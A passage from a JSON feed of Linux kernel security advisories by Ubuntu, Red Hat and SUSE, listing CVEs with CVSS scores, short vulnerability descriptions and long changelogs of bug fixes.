(CVE-2018-6927)\n\nIt was discovered that a NULL pointer dereference existed in the RDS \n(Reliable Datagram Sockets) protocol implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2018-7492)\n\nIt was discovered that the Broadcom UniMAC MDIO bus controller driver in \nthe Linux kernel did not properly validate device resources. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-8043)", "edition": 7, "modified": "2018-04-05T00:00:00", "published": "2018-04-05T00:00:00", "id": "USN-3619-2", "href": "https://ubuntu.com/security/notices/USN-3619-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16994", "CVE-2017-17712", "CVE-2017-5754"], "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754, Important)(ppc only)\n\n* kernel: Race condition in raw_sendmsg function allows denial-of-service or kernel addresses leak (CVE-2017-17712, Important)\n\n* kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak (CVE-2017-16994, Moderate)\n\nBug Fix(es):\n\n* When changing the Maximum Transmission Unit (MTU) size on Broadcom BCM5717, BCM5718 and BCM5719 chipsets, the tg3 driver sometimes lost synchronization with the device. Consequently, the device became unresponsive. With this update, tg3 has been fixed, and devices no longer hang due to this behavior. (BZ#1533478)\n\n* Previously, the perf tool used strict string matching to provide related events to a particular CPUID instruction. Consequently, the events were not available on certain IBM PowerPC systems. This update fixes perf to use regular expressions instead of string matching of the entire CPUID string. As a result, the perf tool now supports events on IBM PowerPC architectures as expected. (BZ#1536567)\n\n* Previously, the kernel debugfs file system implemented removal protection based on sleepable read-copy-update (SRCU), which slowed down the drivers relying on the debugfs_remove_recursive() function. Consequently, a decrease in performance or a deadlock sometimes occurred. This update implements per-file removal protection in debugfs. As a result, the performance of the system has improved significantly. (BZ#1538030)\n\n* When running the 'perf test' command on a PowerKVM guest multiple times, the branch instructions recorded in Branch History Rolling Buffer (BHRB) entries were sometimes unmapped before the kernel processed the entries. Consequently, the operating system terminated unexpectedly. This update fixes the bug, and the operating system no longer crashes in the described situation. (BZ#1538031)", "modified": "2018-03-19T16:23:49", "published": "2018-03-13T19:15:20", "id": "RHSA-2018:0502", "href": "https://access.redhat.com/errata/RHSA-2018:0502", "type": "redhat", "title": "(RHSA-2018:0502) Important: kernel-alt security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-12-08T21:45:39", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16525", "CVE-2014-0038", "CVE-2017-12193", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16527", "CVE-2017-16536", "CVE-2017-15102", "CVE-2017-16939", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16531", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.61 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702 1069708).\n - CVE-2017-1000405: The Linux Kernel had a problematic use of\n pmd_mkdirty() in the touch_pmd() function inside the THP implementation.\n touch_pmd() could be reached by get_user_pages(). In such case, the pmd\n would become dirty. This scenario breaks the new\n can_follow_write_pmd()'s logic - pmd could become dirty without going\n through a COW cycle. This bug was not as severe as the original "Dirty\n cow" because an ext4 file (or any other regular file) could not be\n mapped using THP. Nevertheless, it did allow us to overwrite read-only\n huge pages. For example, the zero huge page and sealed shmem files could\n be overwritten (since their mapping could be populated using THP). Note\n that after the first write page-fault to the zero page, it will be\n replaced with a new fresh (and zeroed) thp (bnc#1069496 1070307).\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to\n cause a denial of service (divide-by-zero error and system crash) or\n possibly have unspecified other impact via a crafted USB device\n (bnc#1067085).\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c in the\n Linux kernel, when CONFIG_X86_X32 is enabled, allowed local users to\n gain privileges via a recvmmsg system call with a crafted timeout\n pointer parameter (bnc#860993).\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c\n in the Linux kernel allowed local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly have unspecified\n other impact via a crafted USB device (bnc#1067086).\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed local users to\n cause a denial of service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted USB device\n (bnc#1066700).\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users\n (who are physically proximate for inserting a crafted USB device) to\n gain privileges by leveraging a write-what-where condition that occurs\n after a race condition and a NULL pointer dereference (bnc#1066705).\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds read and system\n crash) or possibly have unspecified other impact via a crafted USB\n device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor\n (bnc#1066671).\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node splitting, which\n allowed local users to cause a denial of service (NULL pointer\n dereference and panic) via a crafted application, as demonstrated by the\n keyring key type, and key addition and link creation operations\n (bnc#1066192).\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066650).\n - CVE-2017-16525: The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel allowed local users to\n cause a denial of service (use-after-free and system crash) or possibly\n have unspecified other impact via a crafted USB device, related to\n disconnection and failed setup (bnc#1066618).\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066573).\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact via a crafted\n USB device (bnc#1066606).\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local\n users to cause a denial of service (snd_usb_mixer_interrupt\n use-after-free and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066625).\n\n The following non-security bugs were fixed:\n\n - Define sock_efree (bsc#1067997).\n - bcache: Add bch_keylist_init_single() (bsc#1047626).\n - bcache: Add btree_map() functions (bsc#1047626).\n - bcache: Add on error panic/unregister setting (bsc#1047626).\n - bcache: Convert gc to a kthread (bsc#1047626).\n - bcache: Delete some slower inline asm (bsc#1047626).\n - bcache: Drop unneeded blk_sync_queue() calls (bsc#1047626).\n - bcache: Fix a bug recovering from unclean shutdown (bsc#1047626).\n - bcache: Fix a journalling reclaim after recovery bug (bsc#1047626).\n - bcache: Fix a null ptr deref in journal replay (bsc#1047626).\n - bcache: Fix an infinite loop in journal replay (bsc#1047626).\n - bcache: Fix bch_ptr_bad() (bsc#1047626).\n - bcache: Fix discard granularity (bsc#1047626).\n - bcache: Fix for can_attach_cache() (bsc#1047626).\n - bcache: Fix heap_peek() macro (bsc#1047626).\n - bcache: Fix moving_pred() (bsc#1047626).\n - bcache: Fix to remove the rcu_sched stalls (bsc#1047626).\n - bcache: Improve bucket_prio() calculation (bsc#1047626).\n - bcache: Improve priority_stats (bsc#1047626).\n - bcache: Minor btree cache fix (bsc#1047626).\n - bcache: Move keylist out of btree_op (bsc#1047626).\n - bcache: New writeback PD controller (bsc#1047626).\n - bcache: PRECEDING_KEY() (bsc#1047626).\n - bcache: Performance fix for when journal entry is full (bsc#1047626).\n - bcache: Remove redundant block_size assignment (bsc#1047626).\n - bcache: Remove redundant parameter for cache_alloc() (bsc#1047626).\n - bcache: Remove/fix some header dependencies (bsc#1047626).\n - bcache: Trivial error handling fix (bsc#1047626).\n - bcache: Use ida for bcache block dev minor (bsc#1047626).\n - bcache: allows use of register in udev to avoid "device_busy" error\n (bsc#1047626).\n - bcache: bch_allocator_thread() is not freezable (bsc#1047626).\n - bcache: bch_gc_thread() is not freezable (bsc#1047626).\n - bcache: bugfix - gc thread now gets woken when cache is full\n (bsc#1047626).\n - bcache: bugfix - moving_gc now moves only correct buckets (bsc#1047626).\n - bcache: cleaned up error handling around register_cache() (bsc#1047626).\n - bcache: clear BCACHE_DEV_UNLINK_DONE flag when attaching a backing\n device (bsc#1047626).\n - bcache: defensively handle format strings (bsc#1047626).\n - bcache: fix BUG_ON due to integer overflow with GC_SECTORS_USED\n (bsc#1047626).\n - bcache: fix a livelock when we cause a huge number of cache misses\n (bsc#1047626).\n - bcache: fix crash in bcache_btree_node_alloc_fail tracepoint\n (bsc#1047626).\n - bcache: fix for gc and writeback race (bsc#1047626).\n - bcache: fix for gc crashing when no sectors are used (bsc#1047626).\n - bcache: kill index() (bsc#1047626).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bcache: register_bcache(): call blkdev_put() when cache_alloc() fails\n (bsc#1047626).\n - bcache: stop moving_gc marking buckets that can't be moved (bsc#1047626).\n - mac80211: do not compare TKIP TX MIC key in reinstall prevention\n (bsc#1066472).\n - mac80211: use constant time comparison with keys (bsc#1066471).\n - powerpc/powernv: Remove OPAL v1 takeover (bsc#1070781).\n - powerpc/vdso64: Use double word compare on pointers\n - powerpc: Convert cmp to cmpd in idle enter sequence\n\n", "edition": 1, "modified": "2017-12-08T18:11:43", "published": "2017-12-08T18:11:43", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00023.html", "id": "SUSE-SU-2017:3249-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T19:02:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16525", "CVE-2014-0038", "CVE-2017-12193", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16527", "CVE-2017-16536", "CVE-2017-15102", "CVE-2017-16939", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16531", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages. (bnc#1069702)\n - CVE-2017-1000405: mm, thp: do not dirty huge pages on read fault\n (bnc#1069496).\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to\n cause a denial of service (divide-by-zero error and system crash) or\n possibly have unspecified other impact via a crafted USB device.\n (bnc#1067085)\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c, when\n CONFIG_X86_X32 is enabled, allowed local users to gain privileges via a\n recvmmsg system call with a crafted timeout pointer parameter\n (bnc#860993).\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c\n in the Linux kernel allowed local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly have unspecified\n other impact via a crafted USB device. (bnc#1067086)\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed local users to\n cause a denial of service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted USB device.\n (bnc#1066700)\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users\n (who are physically proximate for inserting a crafted USB device) to\n gain privileges by leveraging a write-what-where condition that occurs\n after a race condition and a NULL pointer dereference. (bnc#1066705)\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds read and system\n crash) or possibly have unspecified other impact via a crafted USB\n device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.\n (bnc#1066671)\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node splitting, which\n allowed local users to cause a denial of service (NULL pointer\n dereference and panic) via a crafted application, as demonstrated by the\n keyring key type, and key addition and link creation operations.\n (bnc#1066192)\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066650)\n - CVE-2017-16525: The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel allowed local users to\n cause a denial of service (use-after-free and system crash) or possibly\n have unspecified other impact via a crafted USB device, related to\n disconnection and failed setup. (bnc#1066618)\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066573)\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact via a crafted\n USB device. (bnc#1066606)\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local\n users to cause a denial of service (snd_usb_mixer_interrupt\n use-after-free and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066625)\n\n The following non-security bugs were fixed:\n\n - NVMe: No lock while DMA mapping data (bsc#975788).\n - bcache: Add bch_keylist_init_single() (bsc#1047626).\n - bcache: Add btree_map() functions (bsc#1047626).\n - bcache: Add on error panic/unregister setting (bsc#1047626).\n - bcache: Convert gc to a kthread (bsc#1047626).\n - bcache: Delete some slower inline asm (bsc#1047626).\n - bcache: Drop unneeded blk_sync_queue() calls (bsc#1047626).\n - bcache: Fix a bug recovering from unclean shutdown (bsc#1047626).\n - bcache: Fix a journalling reclaim after recovery bug (bsc#1047626).\n - bcache: Fix a null ptr deref in journal replay (bsc#1047626).\n - bcache: Fix an infinite loop in journal replay (bsc#1047626).\n - bcache: Fix bch_ptr_bad() (bsc#1047626).\n - bcache: Fix discard granularity (bsc#1047626).\n - bcache: Fix for can_attach_cache() (bsc#1047626).\n - bcache: Fix heap_peek() macro (bsc#1047626).\n - bcache: Fix moving_pred() (bsc#1047626).\n - bcache: Fix to remove the rcu_sched stalls (bsc#1047626).\n - bcache: Improve bucket_prio() calculation (bsc#1047626).\n - bcache: Improve priority_stats (bsc#1047626).\n - bcache: Minor btree cache fix (bsc#1047626).\n - bcache: Move keylist out of btree_op (bsc#1047626).\n - bcache: New writeback PD controller (bsc#1047626).\n - bcache: PRECEDING_KEY() (bsc#1047626).\n - bcache: Performance fix for when journal entry is full (bsc#1047626).\n - bcache: Remove redundant block_size assignment (bsc#1047626).\n - bcache: Remove redundant parameter for cache_alloc() (bsc#1047626).\n - bcache: Remove/fix some header dependencies (bsc#1047626).\n - bcache: Trivial error handling fix (bsc#1047626).\n - bcache: Use ida for bcache block dev minor (bsc#1047626).\n - bcache: allows use of register in udev to avoid "device_busy" error\n (bsc#1047626).\n - bcache: bch_allocator_thread() is not freezable (bsc#1047626).\n - bcache: bch_gc_thread() is not freezable (bsc#1047626).\n - bcache: bugfix - gc thread now gets woken when cache is full\n (bsc#1047626).\n - bcache: bugfix - moving_gc now moves only correct buckets (bsc#1047626).\n - bcache: cleaned up error handling around register_cache() (bsc#1047626).\n - bcache: clear BCACHE_DEV_UNLINK_DONE flag when attaching a backing\n device (bsc#1047626).\n - bcache: defensively handle format strings (bsc#1047626).\n - bcache: fix BUG_ON due to integer overflow with GC_SECTORS_USED\n (bsc#1047626).\n - bcache: fix a livelock when we cause a huge number of cache misses\n (bsc#1047626).\n - bcache: fix crash in bcache_btree_node_alloc_fail tracepoint\n (bsc#1047626).\n - bcache: fix for gc and writeback race (bsc#1047626).\n - bcache: fix for gc crashing when no sectors are used (bsc#1047626).\n - bcache: kill index() (bsc#1047626).\n - bcache: register_bcache(): call blkdev_put() when cache_alloc() fails\n (bsc#1047626).\n - bcache: stop moving_gc marking buckets that can't be moved (bsc#1047626).\n - mac80211: do not compare TKIP TX MIC key in reinstall prevention\n (bsc#1066472).\n - mac80211: use constant time comparison with keys (bsc#1066471).\n - packet: fix use-after-free in fanout_add()\n - scsi: ILLEGAL REQUEST + ASC==27 produces target failure (bsc#1059465).\n\n", "edition": 1, "modified": "2017-12-04T15:07:06", "published": "2017-12-04T15:07:06", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00005.html", "id": "SUSE-SU-2017:3210-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-23T20:39:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16913", "CVE-2018-8087", "CVE-2017-16912", "CVE-2017-17975", "CVE-2017-13166", "CVE-2017-15951", "CVE-2017-18208", "CVE-2018-1068", "CVE-2017-16644", "CVE-2018-1000026"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.120 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the v4l2\n video driver was fixed. (bnc#1072865).\n - CVE-2017-15951: The KEYS subsystem did not correctly synchronize the\n actions of updating versus finding a key in the "negative" state to\n avoid a race condition, which allowed local users to cause a denial of\n service or possibly have unspecified other impact via crafted system\n calls (bnc#1062840 bnc#1065615).\n - CVE-2017-16644: The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c allowed local users to cause a\n denial of service (improper error handling and system crash) or possibly\n have unspecified other impact via a crafted USB device (bnc#1067118).\n - CVE-2017-16912: The "get_pipe()" function (drivers/usb/usbip/stub_rx.c)\n allowed attackers to cause a denial of service (out-of-bounds read) via\n a specially crafted USB over IP packet (bnc#1078673).\n - CVE-2017-16913: The "stub_recv_cmd_submit()" function\n (drivers/usb/usbip/stub_rx.c) when handling CMD_SUBMIT packets allowed\n attackers to cause a denial of service (arbitrary memory allocation) via\n a specially crafted USB over IP packet (bnc#1078672).\n - CVE-2017-17975: Use-after-free in the usbtv_probe function in\n drivers/media/usb/usbtv/usbtv-core.c allowed attackers to cause a denial\n of service (system crash) or possibly have unspecified other impact by\n triggering failure of audio registration, because a kfree of the usbtv\n data structure occurs during a usbtv_video_free call, but the\n usbtv_video_fail label's code attempts to both access and free this data\n structure (bnc#1074426).\n - CVE-2017-18208: The madvise_willneed function in mm/madvise.c allowed\n local users to cause a denial of service (infinite loop) by triggering\n use of MADVISE_WILLNEED for a DAX mapping (bnc#1083494).\n - CVE-2018-8087: Memory leak in the hwsim_new_radio_nl function in\n drivers/net/wireless/mac80211_hwsim.c allowed local users to cause a\n denial of service (memory consumption) by triggering an out-of-array\n error case (bnc#1085053).\n - CVE-2018-1000026: A insufficient input validation vulnerability in the\n bnx2x network card driver could result in DoS: Network card firmware\n assertion takes card off-line. This attack appear to be exploitable via\n An attacker on a must pass a very large, specially crafted packet to the\n bnx2x card. This can be done from an untrusted guest VM. (bnc#1079384).\n - CVE-2018-1068: Insufficient user provided offset checking in the\n ebtables compat code allowed local attackers to overwrite kernel memory\n and potentially execute code. (bsc#1085107)\n\n The following non-security bugs were fixed:\n\n - acpi / bus: Leave modalias empty for devices which are not present\n (bnc#1012382).\n - acpi: sbshc: remove raw pointer from printk() message (bnc#1012382).\n - Add delay-init quirk for Corsair K70 RGB keyboards (bnc#1012382).\n - add ip6_make_flowinfo helper (bsc#1042286).\n - ahci: Add Intel Cannon Lake PCH-H PCI ID (bnc#1012382).\n - ahci: Add PCI ids for Intel Bay Trail, Cherry Trail and Apollo Lake AHCI\n (bnc#1012382).\n - ahci: Annotate PCI ids for mobile Intel chipsets as such (bnc#1012382).\n - alpha: fix crash if pthread_create races with signal delivery\n (bnc#1012382).\n - alpha: fix reboot on Avanti platform (bnc#1012382).\n - alsa: hda/ca0132 - fix possible NULL pointer use (bnc#1012382).\n - alsa: hda - Fix headset mic detection problem for two Dell machines\n (bnc#1012382).\n - alsa: hda/realtek - Add headset mode support for Dell laptop\n (bsc#1031717).\n - alsa: hda/realtek: PCI quirk for Fujitsu U7x7 (bnc#1012382).\n - alsa: hda - Reduce the suspend time consumption for ALC256 (bsc#1031717).\n - alsa: hda - Use IS_REACHABLE() for dependency on input (bsc#1031717).\n - alsa: seq: Fix racy pool initializations (bnc#1012382).\n - alsa: seq: Fix regression by incorrect ioctl_mutex usages (bnc#1012382).\n - alsa: usb-audio: add implicit fb quirk for Behringer UFX1204\n (bnc#1012382).\n - alsa: usb-audio: Fix UAC2 get_ctl request with a RANGE attribute\n (bnc#1012382).\n - amd-xgbe: Fix unused suspend handlers build warning (bnc#1012382).\n - arm64: define BUG() instruction without CONFIG_BUG (bnc#1012382).\n - arm64: Disable unhandled signal log messages by default (bnc#1012382).\n - arm64: dts: add #cooling-cells to CPU nodes (bnc#1012382).\n - arm64: Kconfig: select COMPAT_BINFMT_ELF only when BINFMT_ELF is set\n (bnc#1012382).\n - arm: 8731/1: Fix csum_partial_copy_from_user() stack mismatch\n (bnc#1012382).\n - arm: AM33xx: PRM: Remove am33xx_pwrdm_read_prev_pwrst function\n (bnc#1012382).\n - arm: dts: am4372: Correct the interrupts_properties of McASP\n (bnc#1012382).\n - arm: dts: Fix omap4 hang with GPS connected to USB by using wakeupgen\n (bnc#1012382).\n - arm: dts: ls1021a: fix incorrect clock references (bnc#1012382).\n - arm: dts: s5pv210: add interrupt-parent for ohci (bnc#1012382).\n - arm: dts: STi: Add gpio polarity for "hdmi,hpd-gpio" property\n (bnc#1012382).\n - arm: kvm: Fix SMCCC handling of unimplemented SMC/HVC calls\n (bnc#1012382).\n - arm: OMAP2+: Fix SRAM virt to phys translation for\n save_secure_ram_context (bnc#1012382).\n - arm: omap2: hide omap3_save_secure_ram on non-OMAP3 builds (git-fixes).\n - arm: pxa/tosa-bt: add MODULE_LICENSE tag (bnc#1012382).\n - arm: spear13xx: Fix dmas cells (bnc#1012382).\n - arm: spear13xx: Fix spics gpio controller's warning (bnc#1012382).\n - arm: spear600: Add missing interrupt-parent of rtc (bnc#1012382).\n - arm: tegra: select USB_ULPI from EHCI rather than platform (bnc#1012382).\n - asoc: au1x: Fix timeout tests in au1xac97c_ac97_read() (bsc#1031717).\n - asoc: Intel: Kconfig: fix build when acpi is not enabled (bnc#1012382).\n - asoc: Intel: sst: Fix the return value of 'sst_send_byte_stream_mrfld()'\n (bsc#1031717).\n - asoc: mediatek: add i2c dependency (bnc#1012382).\n - asoc: nuc900: Fix a loop timeout test (bsc#1031717).\n - asoc: pcm512x: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE\n (bnc#1012382).\n - asoc: rockchip: disable clock on error (bnc#1012382).\n - asoc: rockchip: use __maybe_unused to hide st_irq_syscfg_resume\n (bnc#1012382).\n - asoc: rsnd: avoid duplicate free_irq() (bnc#1012382).\n - asoc: rsnd: do not call free_irq() on Parent SSI (bnc#1012382).\n - asoc: simple-card: Fix misleading error message (bnc#1012382).\n - asoc: ux500: add MODULE_LICENSE tag (bnc#1012382).\n - ata: ahci_xgene: free structure returned by acpi_get_object_info()\n (bsc#1082979).\n - b2c2: flexcop: avoid unused function warnings (bnc#1012382).\n - binder: add missing binder_unlock() (bnc#1012382).\n - binder: check for binder_thread allocation failure in binder_poll()\n (bnc#1012382).\n - binfmt_elf: compat: avoid unused function warning (bnc#1012382).\n - blacklist.conf: commit fd5f7cde1b85d4c8e09 ("printk: Never set\n console_may_schedule in console_trylock()")\n - blktrace: fix unlocked registration of tracepoints (bnc#1012382).\n - bluetooth: btsdio: Do not bind to non-removable BCM43341 (bnc#1012382).\n - bluetooth: btusb: Restore QCA Rome suspend/resume fix with a "rewritten"\n version (bnc#1012382).\n - bnx2x: Improve reliability in case of nested PCI errors (bnc#1012382).\n - bnxt_en: Fix the 'Invalid VF' id check in bnxt_vf_ndo_prep routine\n (bnc#1012382).\n - bpf: arsh is not supported in 32 bit alu thus reject it (bnc#1012382).\n - bpf: avoid false sharing of map refcount with max_entries (bnc#1012382).\n - bpf: fix 32-bit divide by zero (bnc#1012382).\n - bpf: fix bpf_tail_call() x64 JIT (bnc#1012382).\n - bpf: fix divides by zero (bnc#1012382).\n - bpf: introduce BPF_JIT_ALWAYS_ON config (bnc#1012382).\n - bpf: reject stores into ctx via st and xadd (bnc#1012382).\n - bridge: implement missing ndo_uninit() (bsc#1042286).\n - bridge: move bridge multicast cleanup to ndo_uninit (bsc#1042286).\n - btrfs: copy fsid to super_block s_uuid (bsc#1080774).\n - btrfs: fix crash due to not cleaning up tree log block's dirty bits\n (bnc#1012382).\n - btrfs: fix deadlock in run_delalloc_nocow (bnc#1012382).\n - btrfs: fix deadlock when writing out space cache (bnc#1012382).\n - btrfs: fix kernel oops while reading compressed data (bsc#1081671).\n - btrfs: Fix possible off-by-one in btrfs_search_path_in_tree\n (bnc#1012382).\n - btrfs: Fix quota reservation leak on preallocated files (bsc#1079989).\n - btrfs: fix unexpected -EEXIST when creating new inode (bnc#1012382).\n - btrfs: Handle btrfs_set_extent_delalloc failure in fixup worker\n (bnc#1012382).\n - can: flex_can: Correct the checking for frame length in\n flexcan_start_xmit() (bnc#1012382).\n - cdrom: turn off autoclose by default (bsc#1080813).\n - cfg80211: check dev_set_name() return value (bnc#1012382).\n - cfg80211: fix cfg80211_beacon_dup (bnc#1012382).\n - cifs: dump IPC tcon in debug proc file (bsc#1071306).\n - cifs: Fix autonegotiate security settings mismatch (bnc#1012382).\n - cifs: Fix missing put_xid in cifs_file_strict_mmap (bnc#1012382).\n - cifs: make IPC a regular tcon (bsc#1071306).\n - cifs: use tcon_ipc instead of use_ipc parameter of SMB2_ioctl\n (bsc#1071306).\n - cifs: zero sensitive data when freeing (bnc#1012382).\n - clk: fix a panic error caused by accessing NULL pointer (bnc#1012382).\n - console/dummy: leave .con_font_get set to NULL (bnc#1012382).\n - cpufreq: Add Loongson machine dependencies (bnc#1012382).\n - crypto: aesni - handle zero length dst buffer (bnc#1012382).\n - crypto: af_alg - whitelist mask and type (bnc#1012382).\n - crypto: caam - fix endless loop when DECO acquire fails (bnc#1012382).\n - crypto: cryptd - pass through absence of ->setkey() (bnc#1012382).\n - crypto: hash - introduce crypto_hash_alg_has_setkey() (bnc#1012382).\n - crypto: poly1305 - remove ->setkey() method (bnc#1012382).\n - crypto: s5p-sss - Fix kernel Oops in AES-ECB mode (bnc#1012382).\n - crypto: tcrypt - fix S/G table for test_aead_speed() (bnc#1012382).\n - crypto: x86/twofish-3way - Fix %rbp usage (bnc#1012382).\n - cw1200: fix bogus maybe-uninitialized warning (bnc#1012382).\n - dccp: limit sk_filter trim to payload (bsc#1042286).\n - dell-wmi, dell-laptop: depends DMI (bnc#1012382).\n - dlm: fix double list_del() (bsc#1082795).\n - dlm: fix NULL pointer dereference in send_to_sock() (bsc#1082795).\n - dmaengine: at_hdmac: fix potential NULL pointer dereference in\n atc_prep_dma_interleaved (bnc#1012382).\n - dmaengine: dmatest: fix container_of member in dmatest_callback\n (bnc#1012382).\n - dmaengine: ioat: Fix error handling path (bnc#1012382).\n - dmaengine: jz4740: disable/unprepare clk if probe fails (bnc#1012382).\n - dmaengine: zx: fix build warning (bnc#1012382).\n - dm: correctly handle chained bios in dec_pending() (bnc#1012382).\n - dn_getsockoptdecnet: move nf_{get/set}sockopt outside sock lock\n (bnc#1012382).\n - do not put symlink bodies in pagecache into highmem (bnc#1012382).\n - dpt_i2o: fix build warning (bnc#1012382).\n - driver-core: use 'dev' argument in dev_dbg_ratelimited stub\n (bnc#1012382).\n - drivers/net: fix eisa_driver probe section mismatch (bnc#1012382).\n - drm/amdgpu: Avoid leaking PM domain on driver unbind (v2) (bnc#1012382).\n - drm/amdgpu: Fix SDMA load/unload sequence on HWS disabled mode\n (bnc#1012382).\n - drm/amdkfd: Fix SDMA oversubsription handling (bnc#1012382).\n - drm/amdkfd: Fix SDMA ring buffer size calculation (bnc#1012382).\n - drm/armada: fix leak of crtc structure (bnc#1012382).\n - drm/edid: Add 6 bpc quirk for CPT panel in Asus UX303LA (bnc#1012382).\n - drm/gma500: remove helper function (bnc#1012382).\n - drm/gma500: Sanity-check pipe index (bnc#1012382).\n - drm/nouveau: hide gcc-4.9 -Wmaybe-uninitialized (bnc#1012382).\n - drm/nouveau/pci: do a msi rearm on init (bnc#1012382).\n - drm/radeon: adjust tested variable (bnc#1012382).\n - drm: rcar-du: Fix race condition when disabling planes at CRTC stop\n (bnc#1012382).\n - drm: rcar-du: Use the VBK interrupt for vblank events (bnc#1012382).\n - drm: Require __GFP_NOFAIL for the legacy drm_modeset_lock_all\n (bnc#1012382).\n - drm/ttm: check the return value of kzalloc (bnc#1012382).\n - drm/vmwgfx: use *_32_bits() macros (bnc#1012382).\n - e1000: fix disabling already-disabled warning (bnc#1012382).\n - edac, octeon: 